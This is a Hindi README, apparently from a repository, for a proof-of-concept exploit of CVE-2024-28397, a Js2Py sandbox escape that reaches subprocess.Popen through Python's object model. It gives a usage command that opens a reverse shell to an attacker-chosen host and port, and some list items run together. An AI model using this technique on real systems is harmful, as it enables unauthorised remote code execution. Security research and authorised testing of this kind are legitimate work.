
इस रिपॉजिटरी में CVE-2024-28397 के लिए एक प्रूफ ऑफ कॉन्सेप्ट (PoC) शामिल है, जो js2py लाइब्रेरी में एक कमजोरी है जो सैंडबॉक्स एस्केप के माध्यम से रिमोट कोड एक्जीक्यूशन प्राप्त करने की अनुमति देती है।
विवरण
यह रिपॉजिटरी CVE-2024-28397 के लिए एक Python-आधारित प्रूफ ऑफ कॉन्सेप्ट (PoC) शामिल करता है, जो Python के लिए Js2Py JavaScript इंटरप्रेटर में एक सैंडबॉक्स एस्केप भेद्यता है। जब लक्ष्य एप्लिकेशन Js2Py के माध्यम से अविश्वसनीय JS कोड का मूल्यांकन करता है, तो एक हमलावर सैंडबॉक्स से बाहर निकल सकता है और मनमाना Python कोड निष्पादित कर सकता है। इसका उपयोग भेद्य सिस्टम पर रिमोट कोड एक्सीक्यूशन (RCE) और एक रिवर्स शेल प्राप्त करने के लिए किया जा सकता है।
यह एक्सप्लॉइट Marven11 के CVE-2024-28397-js2py-Sandbox-Escape प्रोजेक्ट से प्रेरित था।
अस्वीकरण
यह स्क्रिप्ट केवल शैक्षिक और अधिकृत पेनिट्रेशन टेस्टिंग उद्देश्यों के लिए प्रदान की गई है। इस स्क्रिप्ट का अनधिकृत उपयोग उन सिस्टमों के विरुद्ध जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है, अवैध और अनैतिक है। लेखक इस स्क्रिप्ट के दुरुपयोग या इसके कारण हुई क्षति के लिए कोई जिम्मेदारी नहीं लेता है।
भेद्यता के बारे में
__class__.__base__.__subclasses__ के माध्यम से Python के ऑब्जेक्ट मॉडल तक अप्रतिबंधित पहुंच, जिससे मनमाना कोड निष्पादन होता हैविशेषताएँ
आवश्यकताएँ
requests मॉड्यूल (pip install requests)/dev/tcp रिवर्स शेल के लिए)उपयोग
python3 exploit.py --target http://example.htb --lhost 10.10.14.51 --lport 4444
--target: भेद्य वेब ऐप एंडपॉइंट का पूरा URL--lhost: आपका स्थानीय IP पता (रिवर्स शेल के लिए उपयोग किया जाता है)--lport: शेल प्राप्त करने के लिए आपका स्थानीय पोर्टयह कैसे काम करता है
__class__.__base__.__subclasses__() का उपयोग करके Python ऑब्जेक्ट ट्री को चलता है ताकि subprocess.Popen ढूंढ सके।Popen का उपयोग करता है।